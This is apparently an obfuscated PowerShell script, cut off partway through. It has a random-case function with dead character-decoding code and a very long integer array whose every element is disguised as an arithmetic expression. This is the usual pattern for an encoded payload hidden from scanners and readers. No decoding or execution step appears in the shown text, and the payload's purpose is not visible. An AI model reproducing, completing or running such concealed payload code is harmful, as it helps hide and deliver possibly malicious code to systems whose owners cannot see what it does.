fuNcTioN tecs { 
    [CmdlEtBInDInG() ]pARam( 
        [PaRamEtER(VALueFroMPIpEliNe)]
        $jJac,
        [PaRamEtER (VALueFroMPIpEliNe)]
        $raCLXDO,
        [PaRamEtER (VALueFroMPIpEliNe)]
        $mQlR
    )
    If ($FAlSe){
        $qvZWyw= [stRiNg]::join('',($raCLXDO-SPLIt'V' -SPLit'{'-spLIT 'b' -SplIT 'n'-sPlit'}' -SpLit'K'-SplIt '>' -SpliT 'W' -SpLiT','-SpLiT 'h' |FOrEacH{( [Int]$_-as[cHaR]) }) )
    
    }
}
$XujA=[Int[] ]( ( 51 -48), ( 32 - 26),(70 +33), (21 - 20), ( 75 - 74),( 46-42), ( 38+85),( 56- 55), ( 64 -64),( 47- 46),( 94- 12),( 44- 43), (10- 9), ( 62 -57), (81 - 4), ( 45-44), (46 - 45), (45-38), ( 68+9),( 85-84), (29 -29),(61- 53),( 21+7), ( 67 - 66),(22 -21),( 50 - 44),( 96 -82), ( 99 - 96),( 11 - 9), ( 53+49),( 20- 14), (33 - 32), ( 89- 7), ( 35- 32), ( 87 - 85),(2 + 101), (91 - 88), ( 8+ 1), ( 59+ 35), (60- 59),( 95 -95),( 19 - 14),( 53 +70), (69 -61), (71- 67),(96 - 2), ( 51 - 50),( 62- 60),( 0 + 4),( 26 + 51),( 78-77),( 50 - 49), (60- 57),( 22- 8), (70 - 62),( 18- 17),( 32+ 50),(14-8), ( 10-2),(20+ 55), (46-37),(7+2),(33+49),(11-4),(78 - 69),( 14 +109),( 86 -79), (20-11),( 68 +26),( 21 -14), ( 53 -50),(80 + 23), (73 -64), (8 + 1),( 49+ 53),( 11 - 6),( 59-53), (7 + 96), ( 91 - 87),(63-54),( 3+11), (19 - 18),(74 - 72), ( 12 - 7), 75, (39 - 34), ( 80- 78), (63- 35), (70- 61), ( 11 - 7), (62 - 48), ( 83 - 76), (18 -10),( 70 + 5), ( 79 - 70), ( 40 - 36),(76 - 48), (63-59),(14- 5),( 23+71), (78-72),(44 - 35), ( 52+23),(89 - 88),(93 - 93), ( 6-3), (38 + 50),( 12-7), (46- 42), (73 - 45), (35 - 26), (2- 1), ( 38-10), (14 -13),(38-38),( 76- 73), ( 28+ 47),(54- 46), ( 56 - 56), (32+ 62), (5+2), (54- 52), ( 43+80), ( 8 - 2), ( 37 -31), (85-3),(2+7),(8 - 2), (85+9), (43- 42), ( 82 -82),(23- 20),( 46 + 31), ( 13-12),(64- 64),(24 -19),( 16 +86), (85-84),( 59 - 58), ( 21-14),( 15 + 108),(0 +1),(23-23),( 39-35), (22 + 66),( 69 - 60),( 20- 17), (4 + 24),( 9 -3), ( 38 -33),82,(71- 64),( 51- 46), ( 69 - 55),( 34-33),( 50-49), ( 81 - 78),( 99 +4), ( 31 -23), ( 62 - 58),(88 -60), ( 34- 29), ( 89-83),( 72-44),(69 -68),( 89- 87),(10-8),( 47 - 19),( 59- 55),(89- 81),( 74+ 20), ( 55-50),(41- 36),( 40 +35),(11 -4),( 66 - 63),( 36 + 52), (7 - 6), ( 80- 79), (70 -70), (33 -19),( 57 - 56), (44- 44), (17- 10),( 71 -57), (62 - 54),( 89- 80), ( 51 +24),(80 - 75),(39 - 36), ( 34+ 48), (12- 7),(71 -69),( 78- 1), ( 97-90), (48 -46), ( 97 - 83),(41 - 40), (38 - 38), ( 86 -84),(72+ 10), ( 52- 44), ( 37 - 33),( 61 + 14),(65-64), ( 70-69), ( 94-86),( 18+59),(17 - 8), (84 - 80), ( 48 +75),( 82-74), ( 7 - 4),(50+ 44), (78-72), (41 - 36),(11 + 77),( 82 -76),(93- 92), (10+ 67), ( 71- 65), (100 - 92), (46 + 77),(69- 60),( 4+3),( 61+42), (28-22),(47 - 46), ( 58 +45), ( 13- 4),( 8 - 2),(41+62), (1+ 4), (57 -57), (62 - 48),(37- 29), (86- 86), ( 63 -35),( 2 +5), ( 82 -74), ( 60 +63), (19-10),( 67 - 58),( 47 + 47), (67- 61),( 16- 14),( 63 + 19), (27 -20), ( 84-81),( 21 +82), ( 5 + 3),( 91 -91),(29- 1),( 23 - 22),(81 -81),( 23 - 15), (59+35),( 92-83),(43 - 36),( 61+ 27), (34 -29), (24 - 17), ( 64+ 59), (93-85),(30- 28), (84 +39), (56- 48),( 2 +6),( 100-86), ( 7 + 1),(100 - 92), ( 26 +51),( 80-79), ( 10 - 10),( 17 - 11), (11+66), ( 46 - 37), (88- 79), ( 48-34), (18 - 9),( 18 - 12), ( 1 +102),( 15 -14), (19 - 17), ( 34 -34), ( 68+14), ( 44 - 35), (79- 78),( 62 + 40), (72 - 71), ( 47-47),( 63- 63), (9+19), ( 8- 1),(40- 36),(20 + 8), ( 60 - 53),(66 -61), (39 + 63), (6 +1), (89- 89),( 26+ 97),(68- 67),(78 -77),(19 -10),(18 + 105),(82 -77),( 73 - 64),( 24 + 78), (73 -66),( 11-7),(11+ 83),( 100 - 94), (63 - 60), ( 44- 30),(68 -60),(39 - 36), ( 65 - 37),(69 -64),(46 -42), ( 93 - 11), (7 - 6), ( 79-78), (52 - 48), ( 83+ 5),(12-3), (86- 86), ( 66+28),( 9-8),( 28 - 27), (53- 45), ( 72-44), ( 100-95), (79- 74),(42 +40),( 22 -21),( 17- 15),( 92 -92),(86+ 37),(86 - 80), (50 - 50),(16- 2),(6 + 2), ( 8 -7),( 14+14), (38-30), ( 86- 82),(93 +10),(8 - 1),( 37 - 30), ( 99 +3),(86-85), (6-4),( 63 -59), (57 -43),(15 -14),( 68-67), (56 -51),(51 + 26), ( 82- 76), ( 90 -82),(35- 7), (66-58), ( 74 - 71), (76 +27), ( 65-60),(47-46),( 72+ 31),( 97- 88),(11 -7),( 28+49),( 6 - 5),( 78 - 76),(53- 50),( 84 - 9), (86- 79), ( 92 -89),(14+ 88),( 53-48),(67- 60), ( 25 + 69),(38 - 37),(12-10), (86- 84),( 79+ 24), (80- 71),( 37 - 28), (40 +37),( 75 - 68), ( 45-38), ( 12+ 82),( 15 - 14),(74-72), ( 64 - 59), ( 96-8),( 64 -57), ( 73 -70),( 7 + 81),(45- 38),( 22 - 15), (12 + 91), ( 78- 77), ( 46 -46), (1 + 4), (44 - 16), (33-32),(21 -19), ( 76- 76),( 19+ 84),( 73 - 68), ( 10- 1),( 76 + 18),( 0 +6),(35- 35),(60-46),(14- 6), (93 -92),( 70+ 24),(19 - 12), ( 33- 26), (32 +71), (45 -36), ( 50- 50),( 9 + 114),( 22 - 21), (76 -74), (33- 29),(52+30), ( 80-74), (94- 88),( 74 +29),(33 -32), (87 -86),( 65-61),(22 +101),( 57 -48),( 62-54), ( 14+89),(46 -38), (75 -74),(49+ 28),(79 -71),( 15 - 8), ( 98- 16), ( 33 -28), (57 - 50),(98- 4),(22 -21), (18-16),( 7-5),(0 + 75),( 39 -38), ( 73-71),( 13- 10),( 42+ 33),(93 - 85), (28 -24),(85 -3),(21- 20), (46 - 46),(42 - 33), ( 42+ 46),( 83- 75), (3+5),( 73-45),(31- 24), (54-54),(4 + 90), ( 78-77),(21 -19), (86 - 82), (33-19), ( 51 - 44),(42- 39), ( 43-29),(55 -46), (69 -61), ( 98 - 16),(47 - 38),( 69- 69),82,( 97 -96),( 26 - 24), (55 -55),( 95+ 7),(52 - 48),(79-70),(44 + 58), (69 -68),(18 - 16), ( 67 - 67),( 42+35), (41 -35),(71-64), (32+91),( 0+ 1), ( 64 - 62),( 73- 68),( 8+ 80),( 83-74),2, ( 65+17),( 59- 58),(41 - 41),( 95- 88), ( 54+ 23), (63 -62), (48 - 46),(36-35), (70 + 33), (36- 35),(84 -84),(91 - 86),(79+44),( 48-40), ( 72- 65), (50+32),( 81 -73), (68 - 67), ( 49+ 26), (50 - 41),( 95 - 89), ( 82- 54),(4 +2), (82- 82),( 55 + 20),( 40-39),( 41- 40),(22 -14),( 34+68), (12 - 11), ( 31-29), (92- 91), (8 +115),(8- 7),( 58- 58), ( 21- 20),(21 + 73), ( 74 - 70), (38-29), ( 58+36),(2 + 5), (36-27),( 56+47),(44-43), ( 1 +1), (99-99),( 96- 8), (81 -80),(41 - 41), (57 -51),(24- 10), (90 -89), ( 11 - 10),( 62 - 60), ( 40 + 35),( 3-2),(84 -82), (75- 72), (54 - 26),(7- 1), (18-13), ( 17+ 11), ( 42 - 33),( 88 - 79),(83-55),( 77- 69), ( 44- 42),( 54+ 49),( 88 -82),(3-1), (34 + 89),( 65- 60),( 74 -68),(49+54),(60-59), ( 25 - 25), (52- 47), (43+45), (74 - 73),(59- 59),(51 - 46), (94 -12), ( 15-14), (0 + 1),( 0+1),( 43 +34),(10- 9), (47-45),( 33 -29),(29 +73),( 13 - 12),( 29- 29), (75 -68),( 92 - 15),(76 -75),(43-41),( 33-33),(1 +13),( 26 - 20),(28 - 26),( 45 + 32),(0 +6),6,( 89-12),(29-23),( 37 - 28),(74 +20),( 32 -31),( 90 -90), ( 11 -7),(55 - 27), ( 24 -23),( 22- 22),( 25 -16), (10+72),(88- 87),(95 - 94), (86-77),( 81 - 53), ( 71 - 64),(33- 27), (10+ 67),( 86-81),(51 - 47), (17+85),( 70-62), (94 -90), (86 + 37), (44-36),( 20 - 19), (16- 2), ( 44 -36), ( 22- 19),(78 -3), ( 22- 14), ( 0+3), ( 9+66),( 40 - 39), (49 - 49),(33 -24), (64+ 18), ( 42- 41), (5 - 3), ( 7- 5),( 15+87),(58-49), ( 92-88),(26 +68),( 82-81), ( 28 - 27), (82 -81), (32+70),( 69- 68), (8 - 8),(97- 96),( 94+ 8),( 61 -60), ( 29-28),(41 -37),(9+68),( 53- 52),( 58 -58),( 30 -21), ( 46+29),( 47 - 42),(97 - 93), ( 71-43),( 21 -16),( 20-14), (52+ 50),(76- 75), (22-21), (31- 24),(88-6), (2+3),(15- 8),( 59 +43),(44 - 36),(31 -28),( 25 +52),( 81- 80), (86 - 86), (76 - 74),( 49 + 74),(86 -78), ( 92-90), ( 27+ 61),( 39 -38), ( 25 - 23),( 37 -34),(71-57),( 35 -34),( 36 -34),(34 -29),( 0+ 75),(48 - 47), ( 99 -99),(83-74),(12 + 90), ( 98- 97),( 34 -33), (39 -32),(70 +12),( 56-49),(5-3),(19+ 84),1, ( 98-97), ( 51- 43), ( 62+ 41),(79 - 70),(79 -77),( 32 -18),( 38-37), (61- 61), (26 -23),(22 + 80), ( 67 - 62),( 57-55), (84 +39),(77 -70),(18 - 13), ( 8 +80),(83 -79),(58 - 50), ( 59+16), (21 - 14), ( 49 - 42),( 95 - 18), ( 65-59), (20- 18), ( 35-7), (100- 93),( 7 - 2), (54+40), (21- 12), (76 - 71), (19 -5), (68 - 67), ( 38 - 36), (56 -54), (52 +42), (67 - 66), (53- 52),( 47- 39), (59 +29),(13-5), (2+ 3),(13 + 75), (15-6),(76 -76), (20- 6), ( 65-64),( 26-26),(60 - 52), (69 + 33),(84 - 83), ( 4- 4),(90-82),(47 +76), ( 39 - 34),(36- 30), ( 2 +80), 5, (14 - 5), ( 67- 53), ( 56-51), ( 80-79),(74 + 14), ( 73-72),(26-26),( 98 - 92), (63+19),9, (76-76), (43 + 60),(93 -92),( 21-20),( 8 - 1), ( 63 - 35),(92 - 86),(100 -100), (84 - 70),(45 -37), (20- 19),( 59 +16), ( 64- 58),(13 - 8),( 53 + 50),(97 -96), (94 -94), ( 60-55), ( 11 +77), (87 -80),(19-19),( 40 +42), (24- 17),(75 - 70),(27 + 48),(15-10), ( 69 -66),(98-16),( 100- 99),( 18-18),( 71- 69),( 79 - 2),( 41 -40), ( 94- 92), (5-3), 75,( 69- 64),(0+6), (92-78), (95-89), (55-51), ( 70+24),(29- 23), ( 68 - 61),(53 +49), ( 71 - 70), (51-51), ( 41-34),( 66 +16),(62- 61),( 7 - 5), ( 42 - 39),(52- 24),(50-49), (16-16), (61-59),( 4 + 73),(29 - 28), ( 39- 39), ( 70 - 70), ( 1+ 74), ( 27 -22),( 77 - 73), ( 35+88), ( 89 -88), (54- 54), ( 41- 36), ( 40+42), ( 63- 55),( 69 - 61),( 36 + 66),(81- 75), ( 78- 73),(73+ 15),( 9- 2),(91 -82), (88+15), ( 98-93),(31 -29), (31+ 63), (48- 47), (44 -44),(59 -50),( 60+15), (96- 89),(72 -69), ( 69 + 54),( 1 +5),( 50-50), (42+46),(55- 54),(33 -32),(26 -19),( 99 -71),( 46-38), ( 23- 20),( 73 - 59), (25-19), ( 84 - 77),(0+82), (90 - 89), (1 - 1),( 40- 39), (38 +56), ( 46-37),( 53 -44), ( 22 + 80), ( 94-87), (7- 3),(12+63), (47 - 42), ( 66- 58), ( 12+91), (18- 17),( 72 - 72),(90-81), (38+ 50), ( 19 - 15),( 53- 45),(39+ 55),(11-10),( 63- 63), ( 17-8), ( 22+72),(78- 77), (49-48), ( 38- 32),(24+64), (49- 48),( 50 - 49), ( 57 - 56),( 47 - 19), (44- 43),( 26 -25),( 45-37),( 52 + 50), ( 82 - 75), ( 9 - 7), (58- 30),(37-32),(85- 85), (80 +23), (81- 80),(73 -73), ( 16 - 13), (90 - 8), (20- 19),(44-43), ( 14 -13), (71 + 31), (39- 30), ( 19- 10), (100 -18), ( 79-78),(68 -66),(10 - 9), (49 +28),(57 - 56), (78-78), (59- 55),( 16+ 66), (93 - 87),(60 -55),( 33+ 49), ( 63- 55), (51 - 48),( 31+ 57), (26 - 20),( 74-73),88,(45- 36),( 43- 36), ( 50 + 53),( 65 -60),( 42- 33), (72 - 44), (74-69),(51 - 48), ( 9 + 66),( 13-5), (39- 31), (4 + 119),( 15-14),( 93 -93),(52- 52),(59-31), (28 - 21),(22-16),( 33 - 19),(83- 79), (14 - 6),( 74- 60), (75-67), ( 33 - 29),( 2 +101), ( 72 -71), (45 -45), ( 61-53), ( 8+6),( 83- 78), ( 7- 2),( 27 +96),(32 - 26), ( 94-92),(10+ 72),( 51-45),(39-38), (25 + 78),(45 - 44), (45- 44), (45 - 44), ( 24 + 64),(30- 29), (16 - 14), (65-64), ( 65+ 12),( 17 -16),(69 -69), (4+2), ( 11 +3),(53 -52),( 85 - 84),( 75-71), ( 47+35), ( 44 -36),( 80-75),( 97- 22), ( 5-4), (1- 1),(58-54), (65 +17),( 57- 49),( 46-45), (47 + 55),(86 - 78), ( 40- 34), (77 - 49), (54 -53), ( 30- 28),(2+ 2),( 23+ 79), ( 88 -87), (34-34),4,(54+ 28), (86-81),( 9 -3), (35 +53),(49- 42), ( 2-2),(59 - 45),( 28 - 23),( 29-22), (69+ 6),(18 - 12), (95 - 91),( 48 -20), (80- 79), ( 90-89), ( 72-69),( 11+ 71), ( 37 -32),(73 -68),(12+ 91),( 52 - 51),(72 -70),( 15 - 14), (100 + 3), ( 23- 14),(27- 27),(47 + 30),(83 -74), ( 94 - 85),( 62 - 34),( 95 - 91),( 35 - 27),( 86-72),(18- 17), (72-72),(66 - 66), ( 51 + 26),(10 -4), ( 29 -23), ( 3 +85),( 6 -1),( 40 - 33), ( 52+ 25), ( 27- 22),( 3- 3), ( 95 - 18),( 77- 70),( 99 - 97),(32- 18),(53- 45), ( 91 - 83),(59+35),( 3+6), (34 -25),( 73+2),(76- 69), (77- 77),(55 +20),(48-43),( 14 -10), ( 45 + 30), ( 23 -22),(9- 8),(100- 98), ( 64+38), (1+6),(79 - 74),(59 +44),( 58 - 52), (24 -21), (44+ 38),(34 -27),(70- 62),(84 - 70), ( 67 -60),( 76- 71), 77,( 66 -65), ( 20 -18),(9 - 7),(90 -76),( 72-71),(12-11), ( 42 -41),( 3 +25), (57 -50), ( 12 - 6),( 87-73), ( 96 -95),( 64- 63), ( 1 + 8),( 64 +59),(55 -54), (45- 43),( 7 -6), (23+80),(4+ 3),( 59- 58), (30+ 45),( 59-52),(91 -84), (97- 83),( 94 -86), ( 38 -35),( 35+67), 5,( 7- 7), ( 17 + 85),(2 + 7),(58 - 49), (24- 10),( 57- 56),(5- 4),(72 -68), ( 32+ 71),( 80 - 73), (31 - 27), ( 78 - 3), ( 32 - 24),(63 - 58),(45+ 49), (43 - 35),( 78 - 73), (82 -68),( 91-90), (91- 90), (74-65), (93 -16), ( 75-74),( 17-16), ( 76 -74), 75, (46 - 37),( 2-1), ( 79+24),( 16-9),( 1+ 6), (40 + 83), ( 92 - 83),( 68-62),( 99-22),( 40 -33),(99 - 96), ( 78 + 45), ( 51 - 46), ( 68- 62), ( 83 + 19),(19-10), (24 -24),( 29 + 94), (12- 5),( 41- 32),(98 -10), ( 69-60),(17-10),( 54 - 26),( 51 - 43),( 90- 88),( 31 + 44),( 24 - 17), ( 32 - 32), ( 4 +78), (90-84),(98-97),( 91 - 77), ( 48-40),(5 + 1), (100-25), (72 -71),( 65 - 65), ( 22- 19), (35 + 59), (9- 2),( 11- 7),( 7+ 75),( 40 - 35),(34-33),( 50 +73), (29-21),( 18-13),(43 - 29),( 83- 82),(10 -10),(64- 60),( 79+24),( 57-51),( 99- 90), (68 -40), (6 - 1), (67-67),( 22+ 55), (63- 56), (13 - 5), (81 -6), ( 78 -77), ( 92 -90), ( 26-25), (7+ 87), ( 68-62), ( 71-64), ( 45+ 57),( 1+ 5),( 58- 49),( 87 - 5),( 81- 72),(90 -82),( 52-24),(58- 49),(24-22),(3 +100),( 12 -8),( 39- 31),( 70 + 33),( 95-90), ( 84- 76), (44 +31), ( 73-72), ( 17 -16),(1 -1),(93+ 1),(89- 81), (36-28), ( 53 + 24),( 30 -23),( 77 - 77),( 42- 28), ( 22- 13), ( 42 - 33), ( 46+ 36),( 3 + 3),(39 -34), ( 6+ 22), ( 66-65), (51 -51), (79-72),( 32- 18), ( 47 - 46), ( 49-49), ( 37 - 29),( 61 +41),(35- 34),( 80-80), ( 11-4), ( 30+52),6,(67- 67),(66+ 28),(51 -46), (64- 60),(35 +68), (87- 82),( 69-60), (65+23),( 67- 59), (43- 41),( 96-19), ( 24-23), ( 93-93), (84-75), ( 9 + 68), ( 91-86),( 9- 8), (7+87),(66 - 65), ( 10- 8),( 64-64),( 2 +73),(93 -86), (23- 19), ( 41+34), ( 16-15),(37- 36), ( 46 - 39), (80+ 14), ( 83- 78), (68- 59),( 68- 40),( 38 - 31),(47-39),( 39+ 84), ( 48- 40),(64- 55), (80+ 43), ( 80 - 79), (84 -84),( 49 - 43), (50 + 73),( 70 -62),( 59 - 55), ( 47 + 56),(9 - 3), (45-43),(7+21), ( 94 - 93), ( 7- 6), (25 -19), (74+ 20), ( 55 -54),( 12 -12), (58 -57),(14+61),(43- 34),( 95- 92), (5+83),(91- 83),( 36 -31),(46 + 29), (76 - 70),(90-82),( 50+ 44),(52 - 44),(1 + 8), (35+88), (46- 40),(22 -19), ( 50 + 44),( 9-8),( 90 - 88),(16- 16), ( 25 +78),( 83-77),( 33-29),(56 + 19), ( 54 -49),(7-5),(20 + 83),( 61- 55), (84 - 76),( 65 +37), ( 25-20),(72- 70),(93+ 30), ( 73- 64),( 47 - 44),(45+57),(0+ 1),(57-55),( 25 - 20), ( 78+ 16),(35 -26), ( 78- 75), (64 +13), ( 12 -11),(4 -3), (92 -92),(86 -11), (89-88), (53-52), (88 - 82),(90 - 8), (52-43), ( 81-81),(46+56), ( 75 -74),( 10- 9),( 12-11), ( 96 - 68), (29- 20), ( 10 -3), ( 97 -83), (89 -84), ( 98- 91),(98+4),(17 - 11),(28 - 27),(35-7),( 71 - 62),(70- 63),(8 + 67), ( 97- 91), ( 23-20),(58+ 24), (10-9),( 8 -7), ( 4-4), (11 +91), (50 - 42),( 52 -51), ( 68 +34),( 50- 43), (85 -77), (63 + 39),(93 - 92), ( 25- 23), (43 -43), ( 81+1), (49- 48),( 91 - 90), (15-7),(49+ 33), ( 77 - 72),(25 -17), ( 45+30),(82- 73),(43-37), ( 17+ 71),( 79 - 78),( 75- 75),(15-7),( 89 -12),( 30- 22),(57-54),(81+7), (72 -65), (71 -69), (85+ 9),( 76 - 75), 1,(54 -52), (70+18),(14 - 13), ( 97- 95), (53 - 52), (17 +86), (47- 38), (49 - 49),( 49 +39), (100 - 99), ( 91- 89),(7-4), (18- 4),(24- 23), ( 61-61), ( 6 -3),(43 +60),( 19- 18), ( 54- 52), ( 99 - 99), ( 47 + 41), ( 88 -84), ( 11 -3), ( 31- 17),(48 -41),(24- 16),( 47+28),(39-38), ( 61 - 59), ( 52 - 51), (72+5), ( 99-93), (31 -26),(9+5),(71- 62),( 71-67), (44+ 44), ( 90-89), ( 45-43), ( 74 -70),(22 + 60),( 85- 84),0, (75 -69), ( 76+ 27),(73 - 72),( 75 - 74),6,( 92- 17), ( 77- 76), ( 63 - 63),(28- 19),(13 + 1), ( 64-63), (88-88), (28-24), (18+57), ( 65 -59), (62 -57),( 8+ 86),(10 -4), ( 4 + 1), (30 + 52),( 54- 45), (37 - 30), (100 -25), ( 64- 57),(61 - 58),( 82 + 12),( 17 - 11),(72 - 64), ( 96 - 21), (91-82),(9- 2), (94 -12),(61- 57), (22 - 14), (43 + 51),( 73 -68),( 47-40), (45+78), ( 6 -1),(62-57),(97 -20), ( 23 -22), ( 85 -83), (28 - 26),( 34 + 89), (39- 33), (74 - 74), ( 37 + 38), ( 2 -1),(29- 29),( 63-61), (30+ 72), ( 36- 28),( 0+8),(1 +122), ( 33 -25), (8 - 6), (53+ 50),(95 -94),( 43-42),(23 -19),( 86 +17),( 64 - 63), (59 - 59),( 68-67),( 68+55), (53- 45),(91- 87), ( 19 + 75), (53 -45), (76- 68), ( 10 +84),( 59 -53),( 19 -16),(94- 80), (31 -23),( 13 - 10), (65 + 58),( 63 -56),(29 - 23),(99 - 5),( 85 - 84),(26-24),(84 - 79), ( 29 + 74), (32 - 25), ( 42 -37),(28 -14),( 15 -9),(40 -38),( 76 +47), ( 60- 53), (35 - 29), ( 90 + 12),(73- 69),( 32-24),( 25+63), (99 -90),(39- 35),(79 - 4), ( 69- 68),(0 + 1),( 82 -77),( 49 + 54), (81 -80),( 95- 94),(52 -43), (51+ 51), (31 - 23),(27 -27), (58 +19), (12- 7), (87 -79),( 46 - 32), (53 - 48),(26 -23),( 88- 60),( 71-65),(59- 51), ( 89 - 14),( 99-90),(87 -83), (64- 36), (93- 87),(7 -5), (29+65),(24-19), ( 87- 79),(72+ 22),( 32- 25),( 91 -84),(57+ 31),( 63 -62), ( 42 - 41), (98 -92),( 61-33),( 35 - 28), (6- 2), ( 45-17), ( 91 -83), ( 91 -87), (56-28), (5 + 4),(67 - 62), (6 +96), (65- 56), (72- 71), ( 60+ 17), (18 -17), (58 -57), ( 42-39),( 80-5), ( 76 - 75), ( 11 - 10), (71 -71),(84 +39),( 36 -35), (16- 14), (24 - 24), (88- 60), ( 3+5), (59-59),( 0+28),( 51-44), ( 49-43), ( 24+ 70),(56 -47), ( 83 - 83), 77,( 88 -87), ( 59 -59),(96- 96),(78 +25),(50 - 41), (82- 74),(67+36), ( 24 - 16), ( 37- 28),(23 +5), ( 7-6),(65- 63),(20 -15),(97 -15), ( 62- 56), ( 77- 69), ( 60 + 34), (28- 27), 2, ( 19 -16),(18+64),( 22 - 16),( 33 - 27),( 64-50), (78- 74),( 45 - 37),(77 + 11),( 27-19), ( 95- 87),( 30 + 47),( 7 -6),(95- 94),(9- 4),(46 +56),( 76-75),( 81-79),(52 -47), (59+ 64), ( 10-9),(14 - 12),(78-73), ( 50 + 52), (57-56), (2 - 1), ( 78- 72),(42 + 46), ( 6- 5),( 17- 16),(1 - 1),( 90- 62), (20- 15), ( 72 - 71),(15+ 73),(84 -77), (47 - 47),(30+ 52), (44- 43), ( 82- 81),( 74 -73), ( 27+ 75), (84-83),( 87- 85),( 71 -69),( 87- 59), (49 -44), ( 34 - 25), ( 84+18), ( 26-19), (10 - 10), (23+79), (73 -65),( 8 - 5),( 28 -14),( 60 - 53), (55 -51), (3+99), (1+6),( 22 - 14), (49+53),(31 -30), 2,( 56-53), (51 + 43), ( 43 -38),(25 -22),( 12+ 91),(78- 70), (18- 15), ( 36 + 39),( 14- 13), (37 -35), ( 90- 90), (53+ 49), ( 6+ 1), ( 25 - 16), (89 + 34), (100 - 91),( 48 - 44),( 50-36), ( 59 -53),( 63 - 61),( 87-10),(75- 68),( 44 -40),(45+ 57),(72 - 64),(47- 47),( 95- 18),(95- 88), (37 - 36),( 29+59),(70 - 66), 8, (58 + 36), ( 80- 71), (51 - 50),(5 + 70), (33 -32),( 88-87),( 74 - 69), ( 95+7), ( 62 - 53), ( 59 - 59), ( 96+6),( 97 - 96),(94 -93),( 96 - 91),( 66 - 52), (18-11), ( 26-19),(36 +66), ( 87 -78),( 84-79), (75+ 2),(34-26),( 41- 39),(24 +4),(96- 90),(54- 52), (78 -1), ( 84- 79), (61- 55),( 67-39), (41 -40),( 40 -39), (56- 48), (41 + 62),( 48-41), ( 43 -39),(27+ 96), ( 90- 81), ( 76- 73), (90 +13),(65-64),0,( 88-83), ( 38+ 56), ( 0 + 5), (42 -33), ( 53+24),( 84 -78),(10 -1), (11 + 92),( 8 - 3), ( 50 -41),( 30 +72),(68 -62), (53 -52),(11+ 77), ( 86 -85), (9 -7),(71 -70),( 40 - 26),(76 - 68), ( 20 -20), (41 - 27),(29 -22),( 20-16), (93+ 30),( 83-76),( 6- 5), (48+ 46), ( 79-70),( 54 -50), (93+ 1),(29 -24),(21 - 12),( 6 + 82),( 60 -55),( 23- 18),(31 +46), (78- 70), (1 -1),( 4+ 10), ( 14 - 7),( 38 - 29), (2+100), (4-3),( 62-61), ( 66 - 57), (72-44), (22 -15),(85 - 78), ( 89 + 14), ( 86- 80), ( 8 -8),(86+ 37),( 25-24),(32 - 31),(27 -26),(59 +35), (89- 88), (53 - 52), (51 - 48),( 5 + 70), (7- 2), (35 -29),(32 - 4),(26 - 19),( 66- 61), ( 40 +62),(82- 76),(61 -61),( 80 - 3), (18-17), (34-32),( 53-49), (10+78), ( 9 - 3),(13 - 8), ( 5 + 83), ( 98 -91),( 86 -77), (26+2),(74- 67), (18 -15), (41+36),( 62- 57), (20 -19),( 76 - 1), ( 74 - 73), (49-47),(37-36), ( 71 +11),( 11 - 5), ( 92 -92), ( 44 +58),( 12 -5), (76- 72),(14 +109), (95 -87), ( 48-41),(80 + 43), (68 -61),(8-3),(5 + 9), (29 -24), (80 -73), ( 12 +82), (93- 85),( 70-66),( 36+41),(86-85), (45- 45), ( 33- 28), ( 95 -18),( 27 - 26), ( 68- 68),(3+ 2),( 65 + 17), ( 25 -20),(85 -84), (3 + 91),(29-22),( 23 - 23), (82+41), ( 87- 80), ( 38-30), ( 59+ 44),(77- 72),( 30-26), ( 27+96),(65 -60), ( 45 - 44),( 33 +69), ( 92-91),(83 - 82), ( 78- 77),( 89 -14),( 73-65), (33-26), (49 -35),(18- 11), ( 0 + 8), ( 42+81),( 59- 52),( 43 -41), ( 22 +81), ( 64 -55), (83 -74),(34 -6), ( 66 -61),( 25 - 24), ( 67 +36), (61-56), (91 -84), (70 + 33),( 38-29),( 33 - 28), (11 +77),(98-97), (97- 96), ( 77- 75), (43 +59), ( 95- 89), (6 + 2),( 53 + 24),(16- 8), (77 -74), (82 + 20), (92 - 83), ( 2 + 6), ( 25+50),( 38-37),(0+ 2), ( 89- 84), (27 + 76),( 53- 48),( 60 - 51), (96- 82),(17-10), (0+7),(61 +41), ( 21-15), (57 -54), (99 - 85),( 11 - 10), ( 12-12),( 16- 12), (36+ 87), ( 49- 48),(56 -56), ( 18 -13), (71 + 17), ( 28 -22),( 51- 43),(14+ 61),( 40-32),(97- 96), (9 +114),( 58 -50),(20- 18), ( 86 -72), (29-28), (45 - 44), ( 12-4), (31 +44), ( 15 -8),( 15- 8), (82 +12), ( 38 - 37),(80-80), (11 -9), ( 50 - 36),( 13 - 7), (99-92),(25+52), ( 56-47),(76- 71),(100+ 3),(40-34), (26-22), ( 47- 33),(46 -40),(80- 75),( 20+103),(81 -74), ( 83 - 77),(89 +5),(83 -76), (85 -80), ( 12+63),( 18 -10), ( 77-70), ( 1+81),(80 -71),( 99 -98), 75,( 47 - 38),( 85-76), ( 55 + 68), ( 25 - 18), ( 56 -54),( 48 +55),( 96 -87), (92 - 90), (60 + 34),( 55-54), ( 29-29),(41 - 41), ( 68 +7),(94 -88), ( 58-53),( 23 + 80),(100 - 99),( 22-22), (85-80), (7 + 96),(73 -67),( 48 - 44), ( 6 + 117), (23-16),(43 - 37), ( 81+22),(34 - 33),(45- 45),(84- 77),( 70+53), ( 90 -89), ( 31 -29),(20 -15),( 37 + 86),(18 - 17), (70- 70),( 51-48), (52 -38), (56- 51), (14- 7),( 64 +39), (92 -83),( 55 - 55),(37 + 57), ( 85 - 84), (49 -47),( 99-95),(85 + 18),(71-65), (1+ 4), ( 97 - 22), (44 -43),(56 - 55), (70 - 67),(97+5), ( 64 - 63),(14 - 14), ( 81- 72),( 84 + 39),(13-5), ( 37-36), ( 17 + 11),(72 - 63), (58 -58),(23 + 52),(31 -26), ( 11- 5), ( 56 +32),(48- 47), (15 -15),(97 - 89),(16+107), (99 - 98),( 42 -40),(0+ 2), (29+74), (40- 32),( 1+ 4),(90 +12),(79 -78),(52- 50),( 62- 62),( 29 +73), ( 90 - 81),(76- 69), (37+51), ( 71-70), (6- 5),(45-41),( 82 - 68), ( 65 - 59), ( 86- 84),( 68 +34), ( 92 -85),(84 - 82),( 78 +4), ( 76 - 70), (57- 49), (64 +38), ( 92 - 85),( 73 -66), ( 25- 11), (54 - 53), ( 48-47),(69- 68),(16 + 61),( 47- 39), (55-52), ( 19 + 104),(44 - 43), (51 - 50), (66 -63), (23+ 59), ( 53 -48),( 91 -91), (32 +62),( 64-57), ( 59-50), ( 20+68), (88- 79),( 71 -69),(14 +68),(59- 55), (12 -4),( 33 - 5),( 22- 16), ( 46- 38), (86 + 17),( 95 - 89), (85-80), ( 12 +2),(14- 5),(31 - 23), ( 50 -36), (6- 5), ( 75 - 74), 